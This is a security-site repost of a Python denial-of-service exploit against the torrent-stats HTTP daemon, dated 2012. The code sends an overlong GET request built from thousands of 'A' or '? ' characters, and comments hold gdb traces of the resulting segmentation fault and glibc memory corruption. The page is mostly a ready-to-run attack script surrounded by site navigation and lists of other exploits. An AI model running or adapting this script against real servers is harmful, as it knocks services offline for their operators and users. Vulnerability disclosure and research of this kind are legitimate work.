首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 torrent-stats httpd.c Denial of Service 来源：vfocus.net 作者：otr 发布时间：2012-02-06   #!/usr/bin/python import socket, urllib, sys host = 'localhost' port = 8080 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(8) print 'Sending GET request' # size = sys.argv[1] # Crash at A * 16378 size = 16379 # DOS #1: gdb trace for buffer1 #Program received signal SIGSEGV, Segmentation fault. #--------------------------------------------------------------------------[regs] #  EAX: 0x00000000  EBX: 0x08051258  ECX: 0x00000000  EDX: 0x20202020  o d I t s Z a P c #  ESI: 0x080537BC  EDI: 0x080537B8  EBP: 0xBFFFF2E8  ESP: 0xBFFFF2B0  EIP: 0x0804AF72 #  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B #--------------------------------------------------------------------------[code] #=> 0x804af72 <httpd_content_handler+306>: movb   $0x0,(%eax) #   0x804af75 <httpd_content_handler+309>: mov    0x20(%ebx),%edx #   0x804af78 <httpd_content_handler+312>: add    $0x1,%eax #   0x804af7b <httpd_content_handler+315>: mov    %eax,(%edx) #   0x804af7d <httpd_content_handler+317>: mov    -0x1c(%ebp),%eax #   0x804af80 <httpd_content_handler+320>: movzbl 0x1(%eax),%edx #   0x804af84 <httpd_content_handler+324>: test   %dl,%dl #   0x804af86 <httpd_content_handler+326>: je     0x804b12e <httpd_content_handler+750> #-------------------------------------------------------------------------------- #parse_args (fd=0x9, privdata=0x8051258) at httpd.c:106 #106  *tmp++ = '\0'; buffer1 = "/" + "A" * int(size) # DOS #2 : gdb trace for the buffer2 # *** glibc detected *** /root/torrent-stats/torrent-stats: munmap_chunk(): invalid pointer: 0x080537b8 *** # *** glibc detected *** /root/torrent-stats/torrent-stats: malloc(): memory corruption: 0x080512c8 *** #gdb$ backtrace #0  0xb7fe2430 in __kernel_vsyscall () #1  0xb7e9b651 in raise () from /lib/tls/i686/cmov/libc.so.6 #2  0xb7e9ea82 in abort () from /lib/tls/i686/cmov/libc.so.6 #3  0xb7ed249d in ?? () from /lib/tls/i686/cmov/libc.so.6 #4  0xb7edc591 in ?? () from /lib/tls/i686/cmov/libc.so.6 #5  0xb7edf395 in ?? () from /lib/tls/i686/cmov/libc.so.6 #6  0xb7ee0f9c in malloc () from /lib/tls/i686/cmov/libc.so.6 #7  0xb7ed2437 in ?? () from /lib/tls/i686/cmov/libc.so.6 #8  0xb7edc591 in ?? () from /lib/tls/i686/cmov/libc.so.6 #9  0xb7edd80e in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0x0804ad26 in destroy_httpd_con (con=0xb7fc6ff4) at httpd.c:43 #11 0x0804b0df in httpd_content_handler (fd=0x9, privdata=0x8051258) at httpd.c:193 #12 0x0804a7a0 in event_loop () at event.c:303 #13 0x0804d237 in main (argc=0x2, argv=0xbffff474) at torrent-stats.c:124 buffer2 = "/" + "? " * int(size) + "?" buffer = buffer2 s.send('GET ' + buffer + ' HTTP/1.1\r\nHost: ' + host + '\r\n\r\n') print s.recv(8192) + s.recv(8192)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Wireshark 1.4.4 Remote Stack B ·HP 5.4SVN-2012-02-03 htmlspeci ·Wireshark 1.4.4 Local Stack Bu ·PHP 5.4.0RC6 64bit Denial of S ·NetSarang Xlpd Printer Daemon ·Edraw Diagram Component 5 Acti ·OfficeSIP Server 3.1 Denial Of ·PDF Viewer Component ActiveX D ·Icona SpA C6 Messenger Downloa ·Microsoft Internet Explorer 8 ·Sunway Forcecontrol SNMP NetDB ·Typsoft FTP Server 1.10 Multip   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved